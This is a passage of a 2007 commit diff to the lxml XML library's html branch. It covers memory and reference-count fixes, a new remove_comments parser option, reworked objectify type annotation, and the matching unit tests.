+# OF THIS SOFTWARE. 
+# -------------------------------------------------------------------- import etree as ET @@ -113,7 +140,10 @@ elem[-1].tail = (elem[-1].tail or "") + item else: elem.text = (elem.text or "") + item - typemap[str] = typemap[unicode] = add_text + if str not in typemap: + typemap[str] = add_text + if unicode not in typemap: + typemap[unicode] = add_text def add_dict(elem, item): attrib = elem.attrib @@ -122,7 +152,8 @@ attrib[k] = v else: attrib[k] = typemap[type(v)](None, v) - typemap[dict] = add_dict + if dict not in typemap: + typemap[dict] = add_dict self._typemap = typemap Modified: lxml/branch/html/src/lxml/etree.pyx ============================================================================== --- lxml/branch/html/src/lxml/etree.pyx (original) +++ lxml/branch/html/src/lxml/etree.pyx Fri Jun 29 19:05:43 2007 @@ -243,8 +243,8 @@ #displayNode(self._c_doc, 0) #print self._c_doc, self._c_doc.dict is __GLOBAL_PARSER_CONTEXT._c_dict #print self._c_doc, canDeallocateChildNodes(self._c_doc) - #tree.xmlFreeDoc(c_doc) - _deallocDocument(self._c_doc) + tree.xmlFreeDoc(self._c_doc) + #_deallocDocument(self._c_doc) cdef getroot(self): cdef xmlNode* c_node @@ -453,8 +453,9 @@ _removeText(c_node.next) tree.xmlReplaceNode(c_node, element._c_node) _moveTail(c_next, element._c_node) - moveNodeToDocument(element, self._doc) - attemptDeallocation(c_node) + moveNodeToDocument(self._doc, element._c_node) + if not attemptDeallocation(c_node): + moveNodeToDocument(self._doc, c_node) def __delitem__(self, Py_ssize_t index): """Deletes the given subelement. @@ -464,14 +465,14 @@ if c_node is NULL: raise IndexError, index _removeText(c_node.next) - _removeNode(c_node) + _removeNode(self._doc, c_node) def __delslice__(self, Py_ssize_t start, Py_ssize_t stop): """Deletes a number of subelements. 
""" cdef xmlNode* c_node c_node = _findChild(self._c_node, start) - _deleteSlice(c_node, start, stop) + _deleteSlice(self._doc, c_node, start, stop) def __setslice__(self, Py_ssize_t start, Py_ssize_t stop, value): """Replaces a number of subelements with elements @@ -486,8 +487,8 @@ else: c_node = _findChild(self._c_node, start) # now delete the slice - if start != stop: - c_node = _deleteSlice(c_node, start, stop) + if c_node is not NULL and start != stop: + c_node = _deleteSlice(self._doc, c_node, start, stop) # if the insertion point is at the end, append there if c_node is NULL: for element in value: @@ -500,12 +501,11 @@ # store possible text tail c_next = element._c_node.next # now move node previous to insertion point - tree.xmlUnlinkNode(element._c_node) tree.xmlAddPrevSibling(c_node, element._c_node) # and move tail just behind his node _moveTail(c_next, element._c_node) # move it into a new document - moveNodeToDocument(element, self._doc) + moveNodeToDocument(self._doc, element._c_node) def __deepcopy__(self, memo): return self.__copy__() @@ -597,9 +597,9 @@ while c_node is not NULL: c_node_next = c_node.next if _isElement(c_node): - _removeText(c_node_next) - c_node_next = c_node.next - _removeNode(c_node) + while c_node_next is not NULL and not _isElement(c_node_next): + c_node_next = c_node_next.next + _removeNode(self._doc, c_node) c_node = c_node_next def insert(self, index, _Element element not None): @@ -614,7 +614,7 @@ c_next = element._c_node.next tree.xmlAddPrevSibling(c_node, element._c_node) _moveTail(c_next, element._c_node) - moveNodeToDocument(element, self._doc) + moveNodeToDocument(self._doc, element._c_node) def remove(self, _Element element not None): """Removes a matching subelement. 
Unlike the find methods, this @@ -629,6 +629,8 @@ c_next = element._c_node.next tree.xmlUnlinkNode(c_node) _moveTail(c_next, c_node) + # fix namespace declarations + moveNodeToDocument(self._doc, c_node) def replace(self, _Element old_element not None, _Element new_element not None): @@ -647,7 +649,9 @@ tree.xmlReplaceNode(c_old_node, c_new_node) _moveTail(c_new_next, c_new_node) _moveTail(c_old_next, c_old_node) - moveNodeToDocument(new_element, self._doc) + moveNodeToDocument(self._doc, c_new_node) + # fix namespace declarations + moveNodeToDocument(self._doc, c_old_node) # PROPERTIES property tag: @@ -1424,7 +1428,7 @@ FTP. Note that XInclude does not support custom resolvers in Python space - due to restrictions of libxml2 <= 2.6.28. + due to restrictions of libxml2 <= 2.6.29. """ cdef python.PyThreadState* state cdef int result @@ -1496,10 +1500,11 @@ if python.PyTuple_GET_SIZE(default) == 0: raise KeyError, key else: - return python.PyTuple_GET_ITEM(default, 0) + result = python.PyTuple_GET_ITEM(default, 0) + python.Py_INCREF(result) else: _delAttribute(self._element, key) - return result + return result def clear(self): cdef xmlNode* c_node Modified: lxml/branch/html/src/lxml/iterparse.pxi ============================================================================== --- lxml/branch/html/src/lxml/iterparse.pxi (original) +++ lxml/branch/html/src/lxml/iterparse.pxi Fri Jun 29 19:05:43 2007 @@ -3,7 +3,7 @@ cdef object __ITERPARSE_CHUNK_SIZE __ITERPARSE_CHUNK_SIZE = 32768 -ctypedef enum IterparseEventFilter: +ctypedef enum _IterparseEventFilter: ITERPARSE_FILTER_START = 1 ITERPARSE_FILTER_END = 2 ITERPARSE_FILTER_START_NS = 4 @@ -234,13 +234,15 @@ * load_dtd - use DTD for parsing * no_network - prevent network access * remove_blank_text - discard blank text nodes + * remove_comments - discard comments """ cdef object _source cdef object _filename cdef readonly object root def __init__(self, source, events=("end",), tag=None, attribute_defaults=False, 
dtd_validation=False, - load_dtd=False, no_network=False, remove_blank_text=False): + load_dtd=False, no_network=False, remove_blank_text=False, + remove_comments=False): cdef _IterparseContext context cdef char* c_filename cdef int parse_options @@ -257,7 +259,7 @@ c_filename = NULL self._source = source - _BaseParser.__init__(self, _IterparseContext) + _BaseParser.__init__(self, remove_comments, _IterparseContext) parse_options = _XML_DEFAULT_PARSE_OPTIONS if load_dtd: Modified: lxml/branch/html/src/lxml/objectify.pyx ============================================================================== --- lxml/branch/html/src/lxml/objectify.pyx (original) +++ lxml/branch/html/src/lxml/objectify.pyx Fri Jun 29 19:05:43 2007 @@ -65,6 +65,8 @@ cdef object islice from itertools import islice +cdef object _ElementMaker +from builder import ElementMaker as _ElementMaker # namespace/name for "pytype" hint attribute cdef object PYTYPE_NAMESPACE @@ -759,7 +761,7 @@ return self.__nonzero__() def __checkBool(s): - if s != 'true' and s != 'false': + if s != 'true' and s != 'false' and s != '1' and s != '0': raise ValueError cdef object _strValueOf(obj): @@ -903,7 +905,7 @@ pytype.register() pytype = PyType('float', float, FloatElement) - pytype.xmlSchemaTypes = ("float", "double") + pytype.xmlSchemaTypes = ("double", "float") pytype.register() pytype = PyType('bool', __checkBool, BoolElement) @@ -1455,8 +1457,6 @@ # Type annotations cdef PyType _check_type(tree.xmlNode* c_node, PyType pytype): - # StrType does not have a typecheck but is the default anyway, - # so just accept it if given as type information if pytype is None: return None value = textOf(c_node) @@ -1468,34 +1468,114 @@ pass return None -def annotate(element_or_tree, ignore_old=True): +def annotate(element_or_tree, ignore_old=True, ignore_xsi=False, + empty_pytype=None): """Recursively annotates the elements of an XML tree with 'pytype' attributes. 
If the 'ignore_old' keyword argument is True (the default), current 'pytype' attributes will be ignored and replaced. Otherwise, they will be checked and only replaced if they no longer fit the current text value. + + Setting the keyword argument ``ignore_xsi`` to True makes the function + additionally ignore existing ``xsi:type`` annotations. The default is to + use them as a type hint. + + The default annotation of empty elements can be set with the + ``empty_pytype`` keyword argument. The default is not to annotate empty + elements. Pass 'str', for example, to make string values the default. """ cdef _Element element + element = cetree.rootNodeOrRaise(element_or_tree) + _annotate(element, 0, 1, bool(ignore_xsi), bool(ignore_old), + None, empty_pytype) + +def xsiannotate(element_or_tree, ignore_old=True, ignore_pytype=False, + empty_type=None): + """Recursively annotates the elements of an XML tree with 'xsi:type' + attributes. + + If the 'ignore_old' keyword argument is True (the default), current + 'xsi:type' attributes will be ignored and replaced. Otherwise, they will be + checked and only replaced if they no longer fit the current text value. + + Note that the mapping from Python types to XSI types is usually ambiguous. + Currently, only the first XSI type name in the corresponding PyType + definition will be used for annotation. Thus, you should consider naming + the widest type first if you define additional types. + + Setting the keyword argument ``ignore_pytype`` to True makes the function + additionally ignore existing ``pytype`` annotations. The default is to + use them as a type hint. + + The default annotation of empty elements can be set with the + ``empty_type`` keyword argument. The default is not to annotate empty + elements. Pass 'string', for example, to make string values the default. 
+ """ + cdef _Element element + element = cetree.rootNodeOrRaise(element_or_tree) + _annotate(element, 1, 0, bool(ignore_old), bool(ignore_pytype), + empty_type, None) + +cdef _annotate(_Element element, int annotate_xsi, int annotate_pytype, + int ignore_xsi, int ignore_pytype, + empty_type_name, empty_pytype_name): cdef _Document doc - cdef int ignore cdef tree.xmlNode* c_node cdef tree.xmlNs* c_ns cdef python.PyObject* dict_result - cdef PyType pytype - element = cetree.rootNodeOrRaise(element_or_tree) + cdef PyType pytype, empty_pytype, StrType, NoneType + + if not annotate_xsi and not annotate_pytype: + return + doc = element._doc - ignore = bool(ignore_old) + + if empty_type_name is not None: + dict_result = python.PyDict_GetItem(_SCHEMA_TYPE_DICT, empty_type_name) + elif empty_pytype_name is not None: + dict_result = python.PyDict_GetItem(_PYTYPE_DICT, empty_pytype_name) + else: + dict_result = NULL + if dict_result is not NULL: + empty_pytype = dict_result + else: + empty_pytype = None StrType = _PYTYPE_DICT.get('str') NoneType = _PYTYPE_DICT.get('none') c_node = element._c_node tree.BEGIN_FOR_EACH_ELEMENT_FROM(c_node, c_node, 1) if c_node.type == tree.XML_ELEMENT_NODE: + typename = None pytype = None value = None - if not ignore: - # check that old value is valid + istree = 0 + # if element is defined as xsi:nil, represent it as None + if cetree.attributeValueFromNsName( + c_node, _XML_SCHEMA_INSTANCE_NS, "nil") == "true": + pytype = NoneType + + if pytype is None and not ignore_xsi: + # check that old xsi type value is valid + typename = cetree.attributeValueFromNsName( + c_node, _XML_SCHEMA_INSTANCE_NS, "type") + if typename is not None: + dict_result = python.PyDict_GetItem(_SCHEMA_TYPE_DICT, typename) + if dict_result is NULL and ':' in typename: + prefix, typename = typename.split(':', 1) + dict_result = python.PyDict_GetItem(_SCHEMA_TYPE_DICT, typename) + if dict_result is not NULL: + pytype = dict_result + if pytype is not StrType: + # StrType does 
not have a typecheck but is the default anyway, + # so just accept it if given as type information + pytype = _check_type(c_node, pytype) + if pytype is None: + typename = None + + if pytype is None and not ignore_pytype: + # check that old pytype value is valid old_value = cetree.attributeValueFromNsName( c_node, _PYTYPE_NAMESPACE, _PYTYPE_ATTRIBUTE_NAME) if old_value is not None and old_value != TREE_PYTYPE: @@ -1508,43 +1588,73 @@ pytype = _check_type(c_node, pytype) if pytype is None: - # if element is defined as xsi:nil, represent it as None - if cetree.attributeValueFromNsName( - c_node, _XML_SCHEMA_INSTANCE_NS, "nil") == "true": - pytype = NoneType - - if pytype is None: - # check for XML Schema type hint - value = cetree.attributeValueFromNsName( - c_node, _XML_SCHEMA_INSTANCE_NS, "type") - - if value is not None: - dict_result = python.PyDict_GetItem(_SCHEMA_TYPE_DICT, value) - if dict_result is NULL and ':' in value: - prefix, value = value.split(':', 1) - dict_result = python.PyDict_GetItem(_SCHEMA_TYPE_DICT, value) - if dict_result is not NULL: - pytype = dict_result - - if pytype is None: # try to guess type if cetree.findChildForwards(c_node, 0) is NULL: # element has no children => data class pytype = _guessPyType(textOf(c_node), StrType) + else: + istree = 1 if pytype is None: - # delete attribute if it exists - cetree.delAttributeFromNsName( - c_node, _PYTYPE_NAMESPACE, _PYTYPE_ATTRIBUTE_NAME) - else: - # update or create attribute - c_ns = cetree.findOrBuildNodeNsPrefix( - doc, c_node, _PYTYPE_NAMESPACE, 'py') - tree.xmlSetNsProp(c_node, c_ns, _PYTYPE_ATTRIBUTE_NAME, - _cstr(pytype.name)) + # use default type for empty elements + if textOf(c_node) is None: + pytype = empty_pytype + if typename is None: + typename = empty_type_name + else: + pytype = StrType + + if pytype is not None: + if typename is None: + if not istree: + if python.PyList_GET_SIZE(pytype._schema_types) > 0: + # pytype->xsi:type is a 1:n mapping + # simply take the first + 
typename = pytype._schema_types[0] + elif typename not in pytype._schema_types: + typename = pytype._schema_types[0] + + if annotate_xsi: + if typename is None or istree: + cetree.delAttributeFromNsName( + c_node, _XML_SCHEMA_INSTANCE_NS, "type") + else: + # update or create attribute + c_ns = cetree.findOrBuildNodeNsPrefix( + doc, c_node, _XML_SCHEMA_NS, 'xsd') + if c_ns is not NULL: + if ':' in typename: + prefix, name = typename.split(':', 1) + if c_ns.prefix is NULL or c_ns.prefix[0] == c'\0': + typename = name + elif cstd.strcmp(_cstr(prefix), c_ns.prefix) != 0: + prefix = c_ns.prefix + typename = prefix + ':' + name + elif c_ns.prefix is not NULL or c_ns.prefix[0] != c'\0': + prefix = c_ns.prefix + typename = prefix + ':' + typename + c_ns = cetree.findOrBuildNodeNsPrefix( + doc, c_node, _XML_SCHEMA_INSTANCE_NS, 'xsi') + tree.xmlSetNsProp(c_node, c_ns, "type", _cstr(typename)) + + if annotate_pytype: + if pytype is None: + # delete attribute if it exists + cetree.delAttributeFromNsName( + c_node, _PYTYPE_NAMESPACE, _PYTYPE_ATTRIBUTE_NAME) + else: + # update or create attribute + c_ns = cetree.findOrBuildNodeNsPrefix( + doc, c_node, _PYTYPE_NAMESPACE, 'py') + tree.xmlSetNsProp(c_node, c_ns, _PYTYPE_ATTRIBUTE_NAME, + _cstr(pytype.name)) + if pytype is NoneType: + c_ns = cetree.findOrBuildNodeNsPrefix( + doc, c_node, _XML_SCHEMA_INSTANCE_NS, 'xsi') + tree.xmlSetNsProp(c_node, c_ns, "nil", "true") tree.END_FOR_EACH_ELEMENT_FROM(c_node) -def xsiannotate(element_or_tree, ignore_old=True): +def __xsiannotate(element_or_tree, ignore_old=True): """Recursively annotates the elements of an XML tree with 'xsi:type' attributes. @@ -1694,6 +1804,9 @@ objectify_parser = __DEFAULT_PARSER def setDefaultParser(new_parser = None): + set_default_parser(new_parser) + +def set_default_parser(new_parser = None): """Replace the default parser used by objectify's Element() and fromstring() functions. 
@@ -1735,6 +1848,42 @@ parser = objectify_parser return _parse(f, parser) +class ElementMaker(_ElementMaker): + def __init__(self, typemap=None): + if typemap is None: + typemap = {} + else: + typemap = typemap.copy() + + typemap[__builtin__.str] = __add_text + typemap[__builtin__.unicode] = __add_text + typemap[__builtin__.int] = __add_text + typemap[__builtin__.long] = __add_text + typemap[__builtin__.float] = __add_text + typemap[__builtin__.bool] = __add_text + + _ElementMaker.__init__(self, typemap, objectify_parser.makeelement) + +def __add_text(_Element elem not None, text): + cdef tree.xmlNode* c_child + if isinstance(text, bool): + text = str(text).lower() + else: + text = str(text) + c_child = cetree.findChildBackwards(elem._c_node, 0) + if c_child is not NULL: + old = cetree.tailOf(c_child) + if old is not None: + text = old + text + cetree.setTailText(c_child, text) + else: + old = cetree.textOf(elem._c_node) + if old is not None: + text = old + text + cetree.setNodeText(elem._c_node, text) + +E = ElementMaker() + cdef object _DEFAULT_NSMAP _DEFAULT_NSMAP = { "py" : PYTYPE_NAMESPACE, "xsi" : XML_SCHEMA_INSTANCE_NS, Modified: lxml/branch/html/src/lxml/parser.pxi ============================================================================== --- lxml/branch/html/src/lxml/parser.pxi (original) +++ lxml/branch/html/src/lxml/parser.pxi Fri Jun 29 19:05:43 2007 @@ -367,7 +367,7 @@ cdef ElementClassLookup _class_lookup cdef python.PyThread_type_lock _parser_lock - def __init__(self, context_class=_ResolverContext): + def __init__(self, remove_comments, context_class=_ResolverContext): cdef xmlParserCtxt* pctxt if isinstance(self, HTMLParser): self._parser_type = LXML_HTML_PARSER @@ -384,8 +384,11 @@ if pctxt is NULL: python.PyErr_NoMemory() if pctxt.sax != NULL: + if remove_comments: + pctxt.sax.comment = NULL # hard switch-off for CDATA nodes => makes them plain text pctxt.sax.cdataBlock = NULL + if not config.ENABLE_THREADING or \ self._parser_type == 
LXML_ITERPARSE_PARSER: # no threading @@ -690,6 +693,7 @@ * ns_clean - clean up redundant namespace declarations * recover - try hard to parse through broken XML * remove_blank_text - discard blank text nodes + * remove_comments - discard comments * compact - safe memory for short text content (default: True) * resolve_entities - replace entities by their text value (default: True) @@ -700,9 +704,9 @@ def __init__(self, attribute_defaults=False, dtd_validation=False, load_dtd=False, no_network=True, ns_clean=False, recover=False, remove_blank_text=False, compact=True, - resolve_entities=True): + resolve_entities=True, remove_comments=False): cdef int parse_options - _BaseParser.__init__(self) + _BaseParser.__init__(self, remove_comments) parse_options = _XML_DEFAULT_PARSE_OPTIONS if load_dtd: @@ -823,15 +827,16 @@ * recover - try hard to parse through broken HTML (default: True) * no_network - prevent network access (default: True) * remove_blank_text - discard empty text nodes + * remove_comments - discard comments * compact - safe memory for short text content (default: True) Note that you should avoid sharing parsers between threads for performance reasons. """ def __init__(self, recover=True, no_network=True, remove_blank_text=False, - compact=True): + compact=True, remove_comments=False): cdef int parse_options - _BaseParser.__init__(self) + _BaseParser.__init__(self, remove_comments) parse_options = _HTML_DEFAULT_PARSE_OPTIONS if remove_blank_text: Modified: lxml/branch/html/src/lxml/proxy.pxi ============================================================================== --- lxml/branch/html/src/lxml/proxy.pxi (original) +++ lxml/branch/html/src/lxml/proxy.pxi Fri Jun 29 19:05:43 2007 @@ -27,6 +27,8 @@ #print "registering for:", proxy._c_node assert c_node._private is NULL, "double registering proxy!" c_node._private = proxy + # additional INCREF to make sure _Document is GC-ed LAST! 
+ python.Py_INCREF(proxy._doc) cdef unregisterProxy(_Element proxy): """Unregister a proxy for the node it's proxying for. @@ -35,6 +37,7 @@ c_node = proxy._c_node assert c_node._private is proxy, "Tried to unregister unknown proxy" c_node._private = NULL + python.Py_DECREF(proxy._doc) ################################################################################ # temporarily make a node the root node of its document @@ -56,6 +59,7 @@ c_new_root = tree.xmlDocCopyNode(c_node, c_doc, 2) # non recursive! tree.xmlDocSetRootElement(c_doc, c_new_root) _copyParentNamespaces(c_node, c_new_root) + _copyParentNamespaces(c_node, c_root) c_new_root.children = c_node.children c_new_root.last = c_node.last @@ -115,19 +119,21 @@ ################################################################################ # support for freeing tree elements when proxy objects are destroyed -cdef void attemptDeallocation(xmlNode* c_node): +cdef int attemptDeallocation(xmlNode* c_node): """Attempt deallocation of c_node (or higher up in tree). """ cdef xmlNode* c_top # could be we actually aren't referring to the tree at all if c_node is NULL: #print "not freeing, node is NULL" - return + return 0 c_top = getDeallocationTop(c_node) if c_top is not NULL: #print "freeing:", c_top.name _removeText(c_top.next) # tail tree.xmlFreeNode(c_top) + return 1 + return 0 cdef xmlNode* getDeallocationTop(xmlNode* c_node): """Return the top of the tree that can be deallocated, or NULL. @@ -167,30 +173,30 @@ tree.END_FOR_EACH_ELEMENT_FROM(c_node) return 1 -cdef void _deallocDocument(xmlDoc* c_doc): - """We cannot rely on Python's GC to *always* dealloc the _Document *after* - all proxies it contains => traverse the document and mark all its proxies - as dead by deleting their xmlNode* reference. 
- """ - cdef xmlNode* c_node - c_node = c_doc.children - tree.BEGIN_FOR_EACH_ELEMENT_FROM(c_doc, c_node, 1) - if c_node._private is not NULL: - (<_Element>c_node._private)._c_node = NULL - tree.END_FOR_EACH_ELEMENT_FROM(c_node) - tree.xmlFreeDoc(c_doc) +## cdef void _deallocDocument(xmlDoc* c_doc): +## """We cannot rely on Python's GC to *always* dealloc the _Document *after* +## all proxies it contains => traverse the document and mark all its proxies +## as dead by deleting their xmlNode* reference. +## """ +## cdef xmlNode* c_node +## c_node = c_doc.children +## tree.BEGIN_FOR_EACH_ELEMENT_FROM(c_doc, c_node, 1) +## if c_node._private is not NULL: +## (<_Element>c_node._private)._c_node = NULL +## tree.END_FOR_EACH_ELEMENT_FROM(c_node) +## tree.xmlFreeDoc(c_doc) ################################################################################ # fix _Document references and namespaces when a node changes documents -cdef void moveNodeToDocument(_Element node, _Document doc): +cdef void moveNodeToDocument(_Document doc, xmlNode* c_element): """Fix the xmlNs pointers of a node and its subtree that were moved. Mainly copied from libxml2's xmlReconciliateNs(). Expects libxml2 doc pointers of node to be correct already, but fixes _Document references. """ + cdef _Element element cdef xmlDoc* c_doc - cdef xmlNode* c_element cdef xmlNode* c_start_node cdef xmlNode* c_node cdef xmlNs** c_ns_new_cache @@ -201,12 +207,10 @@ cdef xmlNs* c_last_del_ns cdef cstd.size_t i, c_cache_size, c_cache_last - c_element = node._c_node - c_doc = c_element.doc - if not tree._isElementOrXInclude(c_element): return + c_doc = c_element.doc c_start_node = c_element c_ns_new_cache = NULL c_ns_old_cache = NULL @@ -300,7 +304,11 @@ # fix _Document reference (may dealloc the original document!) 
if c_element._private is not NULL: - (<_Element>c_element._private)._doc = doc + element = <_Element>c_element._private + if element._doc is not doc: + python.Py_INCREF(doc) + python.Py_DECREF(element._doc) + element._doc = doc if c_element is c_start_node: break @@ -318,7 +326,11 @@ # fix _Document reference (may dealloc the original document!) if c_element._private is not NULL: - (<_Element>c_element._private)._doc = doc + element = <_Element>c_element._private + if element._doc is not doc: + python.Py_INCREF(doc) + python.Py_DECREF(element._doc) + element._doc = doc if c_element is c_start_node: break Modified: lxml/branch/html/src/lxml/python.pxd ============================================================================== --- lxml/branch/html/src/lxml/python.pxd (original) +++ lxml/branch/html/src/lxml/python.pxd Fri Jun 29 19:05:43 2007 @@ -9,6 +9,7 @@ cdef int PY_SSIZE_T_MAX cdef void Py_INCREF(object o) + cdef void Py_DECREF(object o) cdef FILE* PyFile_AsFile(object p) cdef int PyFile_Check(object p) Modified: lxml/branch/html/src/lxml/tests/test_elementtree.py ============================================================================== --- lxml/branch/html/src/lxml/tests/test_elementtree.py (original) +++ lxml/branch/html/src/lxml/tests/test_elementtree.py Fri Jun 29 19:05:43 2007 @@ -1161,6 +1161,26 @@ self.assertXML('', b) self.assertXML('', c) + def test_delslice_tail(self): + XML = self.etree.XML + a = XML('B2C2') + b, c = a + + del a[:] + + self.assertEquals("B2", b.tail) + self.assertEquals("C2", c.tail) + + def test_replace_slice_tail(self): + XML = self.etree.XML + a = XML('B2C2') + b, c = a + + a[:] = [] + + self.assertEquals("B2", b.tail) + self.assertEquals("C2", c.tail) + def test_delitem_tail(self): ElementTree = self.etree.ElementTree f = StringIO('B2C2') @@ -1305,6 +1325,22 @@ self.assertXML( '', a) + + def test_remove_ns(self): + Element = self.etree.Element + SubElement = self.etree.SubElement + + a = Element('{http://test}a') + b = 
SubElement(a, '{http://test}b') + c = SubElement(a, '{http://test}c') + + a.remove(b) + self.assertXML( + '', + a) + self.assertXML( + '', + b) def test_remove_nonexisting(self): Element = self.etree.Element Modified: lxml/branch/html/src/lxml/tests/test_etree.py ============================================================================== --- lxml/branch/html/src/lxml/tests/test_etree.py (original) +++ lxml/branch/html/src/lxml/tests/test_etree.py Fri Jun 29 19:05:43 2007 @@ -161,6 +161,18 @@ self.assertRaises(SyntaxError, parse, f) f.close() + def test_parse_remove_comments(self): + parse = self.etree.parse + tostring = self.etree.tostring + XMLParser = self.etree.XMLParser + + f = StringIO('') + parser = XMLParser(remove_comments=True) + tree = parse(f, parser) + self.assertEquals( + '', + tostring(tree)) + def test_parse_parser_type_error(self): # ET raises IOError only parse = self.etree.parse @@ -195,6 +207,30 @@ self.assertRaises(SyntaxError, parse, f) f.close() + def test_iterparse_comments(self): + # ET removes comments + iterparse = self.etree.iterparse + tostring = self.etree.tostring + + f = StringIO('') + events = list(iterparse(f)) + root = events[-1][1] + self.assertEquals(3, len(events)) + self.assertEquals( + '', + tostring(root)) + + def test_iterparse_remove_comments(self): + iterparse = self.etree.iterparse + tostring = self.etree.tostring + + f = StringIO('') + events = list(iterparse(f, remove_comments=True)) + root = events[-1][1] + self.assertEquals( + '', + tostring(root)) + def test_iterparse_broken(self): iterparse = self.etree.iterparse f = StringIO('') @@ -1387,12 +1423,33 @@ def test_sourceline_parse(self): parse = self.etree.parse - tree = parse(fileInTestDir('test_xinclude.xml')) + tree = parse(fileInTestDir('include/test_xinclude.xml')) self.assertEquals( [1, 2, 3], [ el.sourceline for el in tree.getiterator() ]) + def test_sourceline_iterparse_end(self): + iterparse = self.etree.iterparse + lines = list( + el.sourceline for 
(event, el) in + iterparse(fileInTestDir('include/test_xinclude.xml'))) + + self.assertEquals( + [2, 3, 1], + lines) + + def test_sourceline_iterparse_start(self): + iterparse = self.etree.iterparse + lines = list( + el.sourceline for (event, el) in + iterparse(fileInTestDir('include/test_xinclude.xml'), + events=("start",))) + + self.assertEquals( + [1, 2, 3], + lines) + def test_sourceline_element(self): Element = self.etree.Element SubElement = self.etree.SubElement @@ -1458,6 +1515,41 @@ self.assertRaises(AssertionError, Element, 'ha\0ho') + def test_unicode_byte_zero(self): + Element = self.etree.Element + + a = Element('a') + self.assertRaises(AssertionError, setattr, a, "text", u'ha\0ho') + self.assertRaises(AssertionError, setattr, a, "tail", u'ha\0ho') + + self.assertRaises(AssertionError, Element, u'ha\0ho') + + def test_byte_invalid(self): + Element = self.etree.Element + + a = Element('a') + self.assertRaises(AssertionError, setattr, a, "text", 'ha\x07ho') + self.assertRaises(AssertionError, setattr, a, "text", 'ha\x02ho') + + self.assertRaises(AssertionError, setattr, a, "tail", 'ha\x07ho') + self.assertRaises(AssertionError, setattr, a, "tail", 'ha\x02ho') + + self.assertRaises(AssertionError, Element, 'ha\x07ho') + self.assertRaises(AssertionError, Element, 'ha\x02ho') + + def test_unicode_byte_invalid(self): + Element = self.etree.Element + + a = Element('a') + self.assertRaises(AssertionError, setattr, a, "text", u'ha\x07ho') + self.assertRaises(AssertionError, setattr, a, "text", u'ha\x02ho') + + self.assertRaises(AssertionError, setattr, a, "tail", u'ha\x07ho') + self.assertRaises(AssertionError, setattr, a, "tail", u'ha\x02ho') + + self.assertRaises(AssertionError, Element, u'ha\x07ho') + self.assertRaises(AssertionError, Element, u'ha\x02ho') + def test_encoding_tostring_utf16(self): # ElementTree fails to serialize this tostring = self.etree.tostring @@ -1588,12 +1680,11 @@ self.assertEquals(old_text + content + old_tail, root.text) -class 
ETreeXIncludeTestCase(XIncludeTestCase): - def include(self, tree): - tree.xinclude() - def test_xinclude(self): - tree = etree.parse(fileInTestDir('test_xinclude.xml')) + tree = etree.parse(fileInTestDir('include/test_xinclude.xml')) + self.assertNotEquals( + 'a', + tree.getroot()[1].tag) # process xincludes self.include( tree ) # check whether we find it replaced with included data @@ -1601,6 +1692,10 @@ 'a', tree.getroot()[1].tag) +class ETreeXIncludeTestCase(XIncludeTestCase): + def include(self, tree): + tree.xinclude() + class ElementIncludeTestCase(XIncludeTestCase): from lxml import ElementInclude Modified: lxml/branch/html/src/lxml/tests/test_htmlparser.py ============================================================================== --- lxml/branch/html/src/lxml/tests/test_htmlparser.py (original) +++ lxml/branch/html/src/lxml/tests/test_htmlparser.py Fri Jun 29 19:05:43 2007 @@ -30,7 +30,7 @@ def test_module_HTML_unicode(self): element = self.etree.HTML(self.uhtml_str) self.assertEqual(unicode(self.etree.tostring(element, 'UTF8'), 'UTF8'), - self.uhtml_str) + unicode(self.uhtml_str.encode('UTF8'), 'UTF8')) def test_module_parse_html_error(self): parser = self.etree.HTMLParser(recover=False) Modified: lxml/branch/html/src/lxml/tests/test_objectify.py ============================================================================== --- lxml/branch/html/src/lxml/tests/test_objectify.py (original) +++ lxml/branch/html/src/lxml/tests/test_objectify.py Fri Jun 29 19:05:43 2007 @@ -555,6 +555,26 @@ self.assertEquals("true", root.n.get(XML_SCHEMA_NIL_ATTR)) + def test_pytype_annotation_empty(self): + XML = self.XML + root = XML(u'''\ + + + + ''') + objectify.annotate(root) + + child_types = [ c.get(objectify.PYTYPE_ATTRIBUTE) + for c in root.iterchildren() ] + self.assertEquals(None, child_types[0]) + + objectify.annotate(root, empty_pytype="str") + + child_types = [ c.get(objectify.PYTYPE_ATTRIBUTE) + for c in root.iterchildren() ] + self.assertEquals("str", 
child_types[0]) + def test_pytype_annotation_use_old(self): XML = self.XML root = XML(u'''\ @@ -579,19 +599,19 @@ child_types = [ c.get(objectify.PYTYPE_ATTRIBUTE) for c in root.iterchildren() ] - self.assertEquals("int", child_types[0]) - self.assertEquals("str", child_types[1]) - self.assertEquals("float", child_types[2]) - self.assertEquals("str", child_types[3]) - self.assertEquals("bool", child_types[4]) - self.assertEquals("none", child_types[5]) - self.assertEquals(None, child_types[6]) - self.assertEquals("float", child_types[7]) - self.assertEquals("float", child_types[8]) - self.assertEquals("str", child_types[9]) - self.assertEquals("str", child_types[10]) + self.assertEquals("int", child_types[ 0]) + self.assertEquals("str", child_types[ 1]) + self.assertEquals("float", child_types[ 2]) + self.assertEquals("str", child_types[ 3]) + self.assertEquals("bool", child_types[ 4]) + self.assertEquals("none", child_types[ 5]) + self.assertEquals(None, child_types[ 6]) + self.assertEquals("float", child_types[ 7]) + self.assertEquals("float", child_types[ 8]) + self.assertEquals("str", child_types[ 9]) + self.assertEquals("str", child_types[10]) self.assertEquals("float", child_types[11]) - self.assertEquals("long", child_types[12]) + self.assertEquals("long", child_types[12]) self.assertEquals("true", root.n.get(XML_SCHEMA_NIL_ATTR)) @@ -619,18 +639,18 @@ child_types = [ c.get(XML_SCHEMA_INSTANCE_TYPE_ATTR) for c in root.iterchildren() ] - self.assertEquals("xsd:int", child_types[0]) - self.assertEquals("xsd:string", child_types[1]) - self.assertEquals("xsd:float", child_types[2]) - self.assertEquals("xsd:string", child_types[3]) - self.assertEquals("xsd:boolean", child_types[4]) - self.assertEquals(None, child_types[5]) - self.assertEquals(None, child_types[6]) - self.assertEquals("xsd:int", child_types[7]) - self.assertEquals("xsd:int", child_types[8]) - self.assertEquals("xsd:int", child_types[9]) + self.assertEquals("xsd:int", child_types[ 0]) + 
